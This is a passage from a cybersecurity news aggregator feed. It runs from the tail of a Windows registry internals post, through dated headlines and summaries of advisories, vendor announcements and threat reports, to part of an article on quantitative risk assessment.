Structure name Description ✅ _CM_KCB_LAYER_INFO This is likely the only structure related to layered keys whose definition is public. It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances. In practice, this means that it stores a pointer to the KCB at one level lower (its parent, so to speak), and the head of a linked list with KCBs at one level higher (KCB.LayerHeight+1), if any exist. ❌ Key node stack A stack containing all instances of a given layered key, starting from its level all the way down to level zero (the base key). Each key in this structure is represented by a (Hive, KeyCell) pair. If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure. Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure. This is because operations on layered keys usually require knowledge of the state of lower level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller. Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack". ❌ KCB stack This structure, analogous to the key node stack, represents keys using KCBs. Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it. Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary. This is likely due to the fact that most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios. ❌ Enum stack This data structure allows for the enumeration of subkeys within a given layered key. Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys. At an even higher level, this corresponds to the RegEnumKeyExW API function. The complexity of this structure is evident by the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it. ❌ Enum resume context This data structure, directly tied to the subkey enumeration, primarily serves as an optimization mechanism. After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack. This allows subsequent requests for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps. Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext. The KCB.SequenceNumber field, directly related to this structure, monitors whether a given key has significantly changed since a previous point in time. This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine if the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or if the entire process needs to be restarted. ❌ Value enum stack This data structure, used to enumerate values for layered keys, is similarly complex as those used to list subkeys. The main function utilizing it is CmEnumerateValueFromLayeredKey. Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure. ❌ Sorted value enum stack The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure. This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key. The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations. This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later version of Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack. This lends credibility to the hypothesis that these mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required. ❌ Subtree enumerator This structure enables the enumeration of both the direct subkeys of a layered key and all its deeper descendants. It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total). This mechanism is primarily needed to implement the "rename" operation on layered keys. First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3). ❌ Discard/replace context This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted. Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place. The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.Conclusion The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys. I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially relevant to the most recent code developments in Windows 10 and 11. I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future. This post concludes the part of the series focusing solely on the inner workings of the registry. In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!

https://googleprojectzero.blogspot.com/2025/04/the-windows-registry-adventure-6-kernel.html
People’s Republic of China activity targeting network edge routers: Observations and mitigation strategies
2025-04-16T19:18:04Z | 1744831084

https://cyber.gc.ca/en/news-events/peoples-republic-china-activity-targeting-network-edge-routers-observations-mitigation-strategies
Cyber threat advisory: Expiry of CVE program
2025-04-16T16:39:50Z | 1744821590

Background On 15 April 2025, an internal memo from the non-profit research and development organization MITRE was circulated online. The memo warned that funding for their maintenance of the Common Vulnerabilities and Exposures (CVE) program would end effective 16 April 2025. The CVE Program is widely used by the global cyber security community to categorize vulnerabilities in a standardized format by assigning them unique CVE ID numbers. Shortly before the lapse of the contract on 16 April 2025 it was reported that an 11-month extension to the contract had been agreed, but the long-term stability of the program has been called into question.

https://www.s-rminform.com/latest-thinking/cyber-threat-advisory-expiry-of-cve-program
Why the 2025 PyPI Attack Signals a New Era in Cloud Risk
2025-04-16T15:47:48Z | 1744818468

The 2025 PyPI supply chain attack is a stark reminder of just how vulnerable cloud ecosystems remain to sophisticated, stealthy, and evolving threats.

https://mixmode.ai/blog/why-the-2025-pypi-attack-signals-a-new-era-in-cloud-risk/
Why Swissport Chose Cato Networks to Secure and Streamline its Global IT Infrastructure
2025-04-16T14:05:33Z | 1744812333

Swissport International AG is the world’s largest ground-handling company, ensuring seamless operations across 279 airports in 45 countries handling approximately 247 million airline passengers per year, as of the end of 2024. That kind of scale brings complexity. For Swissport’s new IT leadership, that complexity had grown into an unsustainable mix of legacy security controls,... The post Why Swissport Chose Cato Networks to Secure and Streamline its Global IT Infrastructure   appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-swissport-chose-cato-to-secure-and-streamline-global-it-infrastructure/
TeamCity 2025.03.1 Bug Fix Is Now Available!
2025-04-16T14:00:08Z | 1744812008

The first bug-fix update for version 2025.03, TeamCity On-Premises 2025.03.1, is out and ready to be installed on your servers! This update ships around 30 bug fixes, performance enhancements, and security patches. We highly recommend upgrading to keep your system secure and optimized. The list of resolved issues includes: See TeamCity 2025.03.1 Upgrade Notes for […]

https://blog.jetbrains.com/teamcity/2025/04/teamcity-2025-03-1-bug-fix/
Vulnerabilities in Symfonia Ready_ software
2025-04-16T14:00:00Z | 1744812000

CERT Polska has received a report about 4 vulnerabilities (from CVE-2025-1980 to CVE-2025-1983) found in Symfonia Ready_ software.

https://cert.pl/en/posts/2025/04/CVE-2025-1980/
Security guidance for dark web leaks (ITSAP.00.115)
2025-04-16T13:30:08Z | 1744810208

https://cyber.gc.ca/en/guidance/security-guidance-dark-web-leaks-itsap00115
API Security Is Key to Cyber Resilience in Media and Entertainment
2025-04-16T13:00:00Z | 1744808400

For media and entertainment companies, API expansion means a broader attack surface. Security needs to stay a step ahead.

https://www.akamai.com/blog/security/2025/apr/api-security-key-to-cyber-resilience-media-entertainment
Tenable Appoints Steve Vintz and Mark Thurmond as Co-CEOs
2025-04-16T13:00:00Z | 1744808400

Tenable®, the exposure management company, today announced that its Board of Directors has unanimously appointed Steve Vintz and Mark Thurmond as co-Chief Executive Officers on a permanent basis. Following an extensive search process that considered both internal and external candidates, the Board concluded that Vintz and Thurmond are best positioned to move the company forward. The decision reflects the Board’s confidence in the strength of their leadership following a successful interim period during which they drove significant operational and strategic momentum. The Board also intends to appoint Vintz and Thurmond to the Board immediately following the company’s annual shareholder meeting to be held on May 14, 2025.Vintz, Tenable’s Chief Financial Officer since 2014, and Thurmond, who has served as Chief Operating Officer since 2020, bring deep industry and operational experience. Under the co-CEO structure, Vintz will oversee product, cyber security, corporate development and all general and administrative functions, while Thurmond will oversee GTM functions including sales, professional services, technical support, marketing, and customer success. Together, they will continue to guide the company’s mission to help organizations understand and reduce cyber risk across their modern attack surfaces.“Mark and Steve have demonstrated exceptional leadership and alignment during their time as interim co-CEOs,” said Art Coviello, Chairman of the Tenable Board of Directors. “Their collaborative leadership style, deep industry knowledge, and customer-first mindset have already created strong results. We are confident in their ability to continue driving innovation and long-term value for all stakeholders.”Under their interim leadership, Tenable has expanded its customer footprint, with strong adoption of the Tenable One Exposure Management platform and growing momentum behind Tenable Cloud Security. They also completed the strategic acquisition of Vulcan Cyber, advancing Tenable’s product roadmap with the expected launch of a significantly expanded version of Tenable One that we believe will be the most comprehensive exposure management platform on the market.“We are honored to lead Tenable as co-CEOs and energized by the opportunity ahead,” said Vintz and Thurmond in a joint statement. “We have tremendous belief in Tenable’s mission, team and market position, and we’re excited to build on our momentum to deliver meaningful outcomes for our customers, employees and shareholders.”Coviello, a respected cybersecurity leader, will remain Chairman of the Board. Additionally, Steve Vintz will continue to serve as Chief Financial Officer, while the company conducts a CFO search.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. ###Media Contact:Tenabletenablepr@tenable.comForward-Looking StatementsThis press release includes forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995. All statements contained in this press release other than statements of historical fact, including statements regarding the effects of appointing the co-CEOs, are forward-looking statements and represent our views as of the date of this press release. The words “anticipate,” "believe,” “continue,” “estimate,” “expect,” “intend,” “may,” “will” and similar expressions are intended to identify forward-looking statements. We have based these forward-looking statements on our current expectations and projections about future events and financial trends that we believe may affect our financial condition, results of operations, business strategy, short-term and long-term business operations and objectives and financial needs. These forward-looking statements are subject to a number of assumptions and risks and uncertainties, many of which involve factors or circumstances that are beyond our control that could affect our financial results. These risks and uncertainties are detailed in the sections titled "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Annual Report on Form 10-K for the year ended December 31, 2024 as well as other filings that we make from time to time with the SEC, which are available on the SEC's website at sec.gov. Moreover, we operate in a very competitive and rapidly changing environment. New risks emerge from time to time. It is not possible for our management to predict all risks, nor can we assess the impact of all factors on our business or the extent to which any factor, or combination of factors, may cause actual results to differ materially from those contained in any forward-looking statements we may make. In light of these risks, uncertainties and assumptions, the future events and trends discussed in this press release may not occur and actual results could differ materially and adversely from those anticipated or implied in any forward-looking statements. Except as required by law, we are under no obligation to update these forward-looking statements subsequent to the date of this press release, or to update the reasons if actual results differ materially from those anticipated in the forward-looking statements.

https://www.tenable.com/press-releases/tenable-appoints-steve-vintz-and-mark-thurmond-as-co-ceos
Come See Us at RSA 25 Conference: Enabling Splunk Observability and Security with NETSCOUT Smart Data
2025-04-16T13:00:00Z | 1744808400

Splunk has a great commercial titled No more “I don’t knows.” The commercial depicts an organization struggling to determine why its business-critical application is down. Question: Who’s working on the problem - IT, Engineering, Security? Answer: I don’t know. Question: Is it the network, the application, a cyber...

https://www.netscout.com/blog/come-see-us-rsa-25-conference-enabling-splunk-observability
SonicWall Connect Tunnel Windows Client Improper Link Resolution Vulnerability
2025-04-16T12:30:28Z | 1744806628

A Improper Link Resolution vulnerability (CWE-59) in the SonicWall Connect Tunnel Windows (32 and 64 bit) Client, this results in unauthorized file overwrite, potentially leading to denial of service or file corruption. CVE: CVE-2025-32817 Last updated: April 16, 2025, 12:30 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0007
Cisco news in 60 seconds: Connected bees
2025-04-16T12:00:00Z | 1744804800

Cisco tech aids bee conservation by enhancing habitat monitoring, optimizing hive health data, and supporting research to promote thriving bee populations.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/cisco-news-in-60-seconds-connected-bees.html
The Psychology of Privacy: Why Consumers Care More Than Ever
2025-04-16T12:00:00Z | 1744804800

Consumers today are more privacy-conscious than ever before. High-profile data breaches, AI-driven tracking, and increasing regulatory scrutiny have made privacy a top concern for individuals and businesses. In fact, a 2023 study by Cisco found that 87% of consumers will not do business with a company they don't trust to protect their data.

https://blog.riskrecon.com/the-psychology-of-privacy-why-consumers-care-more-than-ever
NowSecure Drives OWASP Mobile Standards to Strengthen AppSec
2025-04-16T11:30:00Z | 1744803000

NowSecure recently celebrated three years of contributing to the OWASP Mobile App Security Project which produces globally recognized standards for secure mobile app development and mobile app security testing. The company’s industry leadership as an OWASP MAS Advocate has advanced mobile security and provided mobile application risk management solutions that align with OWASP standards to […] The post NowSecure Drives OWASP Mobile Standards to Strengthen AppSec appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/04/16/nowsecure-drives-owasp-mobile-standards-to-strengthen-appsec/
Sophos Annual Threat Report appendix: Most frequently encountered malware and abused software
2025-04-16T10:00:30Z | 1744797630

These are the tools of the trade Sophos detected in use by cybercriminals over 2024

https://news.sophos.com/en-us/2025/04/16/the-sophos-annual-threat-report-appendix-most-frequently-encountered-malware-and-abused-software/
The Sophos Annual Threat Report: Cybercrime on Main Street 2025
2025-04-16T10:00:22Z | 1744797622

Ransomware remains the biggest threat, but old and misconfigured network devices are making it too easy

https://news.sophos.com/en-us/2025/04/16/the-sophos-annual-threat-report-cybercrime-on-main-street-2025/
Multiple FortiGate devices compromised with a persistent read-only access
2025-04-16T09:22:07Z | 1744795327

Please note: The original author of this post was Kamil Mankowski. Alexander Riepl was merely responsible for publishing and some translation efforts. On Friday, April 10th, Fortinet released information about a worldwide compromise of FortiGate devices, giving the attacker persistent read-only access. Threat actors seemingly used three known vulnerabilities in the SSL VPN feature to gain initial access to the devices and a symbolic link in the file system to survive patching of FortiOS. Background FortiGate is a VPN solution that enables remote access to corporate systems. It provides the legacy SSL VPN solution as one of its options. This feature was previously exposed to critical vulnerabilities CVE-2022-42475, CVE-2023-27997 and CVE-2024-21762. Each of these vulnerabilities allowed a remote, unauthenticated attacker to execute code on the device via a specially crafted request. The attacker used these vulnerabilities to compromise Fortigate devices and then placed a symbolic link in a folder used to serve language files. These are accessible without authentication, allowing anyone knowing the location to gain read-only access to the file system, including the full device configuration. The vulnerability patches provided by Fortinet did not remove the symlink. The ShadowServer Foundation has identified several thousand compromised devices worldwide. Our internal analysis shows up to 840 affected devices in Austria at the highest peak, and the current number is slightly higher than the  number ShadowServer reports for Austria. Devices at risk All FortiGate devices, physical or virtual, that have or have had the SSL-VPN feature enabled and were ever vulnerable to one of the mentioned vulnerabilities (see affected FortiOS versions in the advisories - 1, 2, 3) are potentially at risk. According to CERT.nz, the attacks could have occurred as early as 2023. Although the details of the attack have not been made public, CERT.at was informed about this incident by a third party at the beginning of the year. Since then, we have been monitoring the situation in Austria closely and have been actively informing network operators since February. According to Fortinet, their active customers have also been contacted. Mitigation If your device has been compromised, we recommend you initiate an incident response and investigate all activity on the device. Fortinet has also released mitigations, including: AV/IPS signatures that flag the malicious symlink - for devices with active IPS FortiOS versions 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16 that remove the symlink Fortinet has also published guidelines to recover compromised devices. If you received our February alert, please note that there are currently updates available that remove the malicious artifact. Further recommendations We strongly recommend that all FortiGate administrators ensure that their firmware is up to date. For organisations using SSL VPN, we recommend considering a long-term migration to alternative remote access methods due to the long history of security issues. Fortinet offers migration guides to IPSec or dial-up VPN depending on the use case.

https://www.cert.at/en/blog/2025/4/multiple-fortigate-devices-compromised-with-a-persistent-read-only-access
They’re coming for your data: What are infostealers and how do I stay safe?
2025-04-16T09:00:00Z | 1744794000

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data

https://www.welivesecurity.com/en/malware/theyre-coming-data-infostealers-how-stay-safe/
Preparing for the UK’s Failure to Prevent Fraud offence: The Corporate Intelligence edge
2025-04-16T08:44:06Z | 1744793046

The Economic Crime and Corporate Transparency Act 2023 (ECCTA), which was formally enacted on 26 October 2023, is one of the most significant pieces of anti-fraud legislation in decades. It was introduced amid a surge in economic crime in the UK, in 2023, fraud accounted for 41% of all crimes in England and Wales, costing the UK economy hundreds of billions annually, according to Home Office data. The new ECCTA provision - coming into force on 1 September 2025 - imposes stringent obligations on businesses to detect, prevent, and report fraudulent activities, with non-compliance penalties reaching up to 10% of global turnover. In this article, Mario Levin (CAMS) analyses the ECCTA's implications, underscores how corporate intelligence could be pivotal to compliance and speaks to compliance expert Gaon Hart about some of the Act’s unique aspects.

https://www.s-rminform.com/latest-thinking/preparing-for-the-uk-failure-to-prevent-fraud-offence-the-corporate-intelligence-edge
Failivahetuskeskkond sahver.eesti.ee suletakse 19. mail 2025
2025-04-16T08:21:50Z | 1744791710

Riigi Infosüsteemi Ameti (RIA) hallatav failivahetuskeskkond sahver.eesti.ee suletakse alates 19. mai 2025, muutunud andmevahetuse vajadused ja kuluefektiivsuse kaalutlused ei toetanud enam teenuse pikaajalist jätkusuutlikkust.

https://ria.ee/uudised/failivahetuskeskkond-sahvereestiee-suletakse-19-mail-2025
Interlock ransomware evolving under the radar
2025-04-16T08:18:53Z | 1744791533

Introduction Interlock is a ransomware intrusion set first observed in September 2024 that conducts Big Game Hunting and double extortion campaigns. Interlock cannot be classified as a “Ransomware-as-a-Service” (RaaS) group, as no advertisements for recruiting affiliates or information about affiliates have been found as of March 2025. As many other ransomware groups, Interlock has a […] La publication suivante Interlock ransomware evolving under the radar est un article de Sekoia.io Blog.

https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/
Reconnaissance Explained: Why Attackers Map Your Network Perimeter and How to Stop Them
2025-04-16T08:13:47Z | 1744791227

Before a breach hits the news or a ransomware payload locks down your systems, attackers are already inside your digital footprint, quietly observing, analyzing, and planning. This is the reconnaissance phase, the crucial opening move in any sophisticated cyberattack. Part of the cyber kill chain, reconnaissance allows attackers to build a blueprint of your organization’s […] The post Reconnaissance Explained: Why Attackers Map Your Network Perimeter and How to Stop Them appeared first on CounterCraft.

https://www.countercraftsec.com/blog/reconnaissance-cybersecurity-deception/
ZDI-CAN-26978: Apple
2025-04-16T05:00:00Z | 1744779600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-16, 51 days ago. The vendor is given until 2025-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26966: Apple
2025-04-16T05:00:00Z | 1744779600

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-16, 51 days ago. The vendor is given until 2025-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26520: Samsung
2025-04-16T05:00:00Z | 1744779600

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Paolo `paupu` Cavaglia of Shielder, Abdel Adim `smaury` Oisfi of Shielder and Nicola `fromVeeko` Davico of Shielder' was reported to the affected vendor on: 2025-04-16, 51 days ago. The vendor is given until 2025-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26463: Schneider Electric
2025-04-16T05:00:00Z | 1744779600

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-16, 51 days ago. The vendor is given until 2025-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26363: Microsoft
2025-04-16T05:00:00Z | 1744779600

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-16, 51 days ago. The vendor is given until 2025-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Security Alert (A25-04-14): Vulnerability in Firefox
2025-04-16T04:00:00Z | 1744776000

Mozilla has published an advisory (MFSA2025-25) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-15): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2025)
2025-04-16T04:00:00Z | 1744776000

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing the refreshed Recorded Future brand
2025-04-16T00:00:00Z | 1744761600

Learn how Recorded Future's brand refresh, powered by AI and actionable threat intelligence, helps teams evolve with the next generation of cybersecurity.

https://www.recordedfuture.com/blog/introducing-refreshed-recorded-future-brand
CVE-2025-0125 PAN-OS: Improper Neutralization of Input in the Management Web Interface (Severity: MEDIUM)
2025-04-16T00:00:00Z | 1744761600

CVE-2025-0125 PAN-OS: Improper Neutralization of Input in the Management Web Interface (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0125
CVE-2025-0122 Prisma SD-WAN: Denial of Service (DoS) Vulnerability Through Burst of Crafted Packets (Severity: MEDIUM)
2025-04-15T21:15:00Z | 1744751700

CVE-2025-0122 Prisma SD-WAN: Denial of Service (DoS) Vulnerability Through Burst of Crafted Packets (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0122
Network Security Assessment: A Guide
2025-04-15T21:04:11Z | 1744751051

Network security analysis is essential for safeguarding an organization’s sensitive data, maintaining industry compliance, and staying ahead of threats. These assessments scan network systems, identify vulnerabilities, simulate attacks, and provide...

https://www.firemon.com/blog/network-security-assessment-a-guide/
Search engine optimization poisoning (ITSAP.00.013)
2025-04-15T17:07:22Z | 1744736842

https://cyber.gc.ca/en/guidance/search-engine-optimization-poisoning-itsap00013
Securing the Open Source Supply Chain: A Network-Centric Approach
2025-04-15T16:54:13Z | 1744736053

The widespread use of OSS — from foundational operating systems like Linux to orchestration platforms like Kubernetes — has enabled rapid development and faster innovation. However, as OSS adoption accelerates with the rise of GenAI tools and platforms, so too does the complexity and risk associated with securing open source software. This blog is intended for IT and security leaders who recognize these challenges and are seeking effective strategies to address them. The post Securing the Open Source Supply Chain: A Network-Centric Approach first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/securing-open-source-software/
Generative AI Usage Gone Rogue? Cato Networks Mitigates Shadow AI Risk with Cato CASB
2025-04-15T16:07:45Z | 1744733265

Today during SASEfy 2025, Cato Networks announced its latest AI innovation. Cato CASB (Cloud Access Security Broker), a native feature in the Cato SASE Cloud Platform, is now enhanced with new capabilities for generative (GenAI) applications including a shadow AI dashboard and policy engine. With the shadow AI dashboard, enterprises can detect, analyze, and gain... The post Generative AI Usage Gone Rogue? Cato Networks Mitigates Shadow AI Risk with Cato CASB  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-mitigates-shadow-ai-risk-with-cato-casb/
Graylog Security and Log Management Solutions Drive Record 564% Growth in APAC Region
2025-04-15T15:11:22Z | 1744729882

Graylog, a leader in Threat Detection, Investigation, and Response, is deepening its commitment to the APAC region following a 6.5X increase in sales over the past two years — the fastest growth rate of any market for the company. The post Graylog Security and Log Management Solutions Drive Record 564% Growth in APAC Region appeared first on Graylog.

https://graylog.org/news/graylog-solutions-drive-record-growth-in-apac/
How to Turn Quantitative Risk Assessment into Action
2025-04-15T13:50:58Z | 1744725058

Summary Quantitative risk assessment translates cybersecurity risk into financial terms. You can use the output of a quantitative risk assessment to decide on your risk response: avoiding the risk, accepting the risk, transferring the risk or mitigating the risk. A risk appetite framework allows you to handle nuanced or ambiguous cases where the appropriate risk response is unclear. Collectively, these processes help organizations strike a balance between security imperatives and business objectives. Quantitative risk assessment offers an objective approach to risk analysis – but understanding the risk is only the first step. This article will break down how to interpret the results and translate those insights into meaningful decisions in a real-world environment. (While this article doesn’t cover how to perform a quantitative risk analysis, you can go through the process in depth in our Guide to Data-Driven Risk Assessment.) Understanding risk quantification First things first – what is quantitative risk assessment, anyway? What is risk quantification? Quantitative risk assessment (sometimes abbreviated as QRA) assigns a dollar value to a cybersecurity risk based on its potential impact and likelihood. It asks the question: If this asset is exposed through this vulnerability, what will it cost us? In contrast to qualitative methods, which sort risks into categories of severity, a quantitative approach provides a more objective picture. Why does this matter? Qualitative cybersecurity risk assessments leave much more room for interpretation. Translating risk into the language of the business – i.e. dollars and cents – removes much of this ambiguity and helps non-security leaders understand what a “high” risk really means in context. How does risk quantification fit into the larger cybersecurity strategy? Quantifying risk is an essential tool for managing exposure, but it’s not the end goal. Instead, it forms the foundation for making risk mitigation decisions. For example, when you're able to present risk exposure as, say, "$1.5 million in potential damages due to a vendor using unencrypted cloud communication," it becomes easier to weigh your options for responding to that risk, which we’ll explore in more detail later in this article. Interpreting quantitative risk analysis: key elements There are a few key elements of a quantitative risk analysis that are important to understand in order to interpret the results. Asset value (AV): What the asset being protected is worth to your organization. Exposure factor (EF): The percentage of the asset value that may be lost or compromised if the risk materializes. Annualized rate of occurrence (ARO): How frequently you expect that risk to materialize annually. (This may be less than 1 for risks that materialize less than once a year.) These three figures allow you to calculate: Single loss expectancy (SLE): The financial value that would be lost in a single threat event if the risk materializes. You calculate this value using the formula AV x EF. Annual loss expectancy (ALE): The financial value that would be lost annually if the risk materializes. You calculate this value using the formula SLE x ARO. Residual ALE: The financial value that would be lost annually if the risk materializes after applying mitigations. Mitigations reduce EF, ARO or both, but the calculations otherwise remain the same. ALE is the main output of the risk analysis, and it’s the most important figure that you’ll use to weigh your risk response options. But it’s not a perfect number, which is why there’s one more key element: uncertainty. AV, EF and ARO are all estimates. Ideally, they’re very close estimates, based on careful research, but still estimates. The level of confidence you should have in those estimates is usually represented by a confidence level (e.g. 80%), followed by a list of unknowns. Where the rubber meets the road: risk response So far, we’ve covered how to interpret a quantitative risk assessment. But the ultimate purpose of risk analysis is to decide what to do about that risk. All risk responses broadly fall into one of four categories: avoid, accept, transfer or mitigate. Avoid Avoiding the risk means eliminating the exposure entirely. It’s the only risk response that actually reduces the risk to zero. In practical terms, this means shutting down a risk-bearing process or system. Avoidance is basically a nuclear option, and it’s rarely feasible. For example, you can reduce the risk of phishing to zero by shutting down all external email exchange. If you’re working with matters of national security, this might actually be worth it. For the rest of us, this would bring business operations to a screeching halt. Your risk analysis might support this response in two situations: if the ALE is so extreme that no mitigation strategy can reduce it to an acceptable level, or if there is a 1:1 alternative to the risk-bearing process or system that would reduce the EF or ARO to zero. Accept Accepting the risk means choosing to do nothing. While this might sound unreasonable at first blush, it’s an option that deserves serious consideration. There’s one very straightforward scenario in which accepting the risk is your best option: when the cost of mitigation exceeds the residual ALE (i.e. the ALE after mitigation). In this situation, it costs more to protect your organization than it stands to lose. But there are also more nuanced situations in which acceptance makes sense. These take into account the opportunity cost of mitigating a risk, whether that’s narrowly focused on the security team or an opportunity cost for the business as a whole. No security team has unlimited resources. Acceptance is a reasonable (if uncomfortable) option if choosing to mitigate this risk means diverting resources away from addressing a more concerning exposure. Especially when the mitigation strategy is very manual and would demand many staff hours to implement, what are they not doing so they can devote their time to this effort? There’s also a broader opportunity cost to consider, which is what opportunities the business would have to give up in order to mitigate or avoid the risk. In other words, acceptance might make sense when the business opportunity is greater than the ALE. This could be the case if, say, you opened a data center in a foreign country to provide cloud services to a new market. While it opens you up to new security risks, there’s a clear business benefit. Transfer Transferring risk means putting the burden onto another party, usually cybersecurity insurance. Broadly speaking, transferring risk to insurance is an option when insurance costs less than your ALE – but there are a few caveats. First, insurance only covers the financial cost of a security incident. There are legal and reputational damages associated with security incidents as well. If your ALE factored in these damages and assigned them a dollar value (which, ideally, it did), then you’ll need to break down that number to look only at the immediate financial costs. Transferring the risk makes sense when the financial risk is high, but the legal and reputational risks are low. Second, insurance will almost certainly require you to have some security controls in place, and it might also cease coverage for recurring incidents. This means you will need to add the cost of those controls to the cost of insurance, possibly changing your calculation. It also means that transferring risk to insurance can only be a temporary measure for a risk with a high ARO. Mitigate Mitigation is your most proactive response, in which you reduce your exposure by applying security controls, patching vulnerabilities, correcting misconfigurations, etc. Mitigation won’t eliminate your exposure – the only way to do that is to avoid the risk altogether. Instead, mitigation lowers your risk by taking steps to reduce your EF, your ARO or both. You can then calculate a new ALE, known as your residual ALE. In general, mitigation is a strong option when the difference between the original ALE and the residual ALE is greater than the cost of mitigation. Incorporating risk appetite (or how to handle edge cases) Not every risk assessment will offer you a clear-cut choice of response. There will always be cases where the margins between two options are slim or the uncertainty level is high. Incorporating risk appetite will help you make sense of those edge cases. Risk appetite is not usually part of a risk analysis, but it’s a useful frame through which to interpret that analysis. (If your organization doesn’t already have their risk appetite documented, you can use this editable risk appetite statement template as a starting point.) Risk appetite is the level of risk an organization is willing to accept in pursuit of its objectives. A high risk appetite means being open to accepting greater risks for possibly higher rewards, while a low risk appetite means you prefer reducing risk as much as possible. Risk appetite exists on multiple dimensions: you may have a high appetite for operational risk but a low appetite for compliance risk. Within each of these dimensions (security risk, 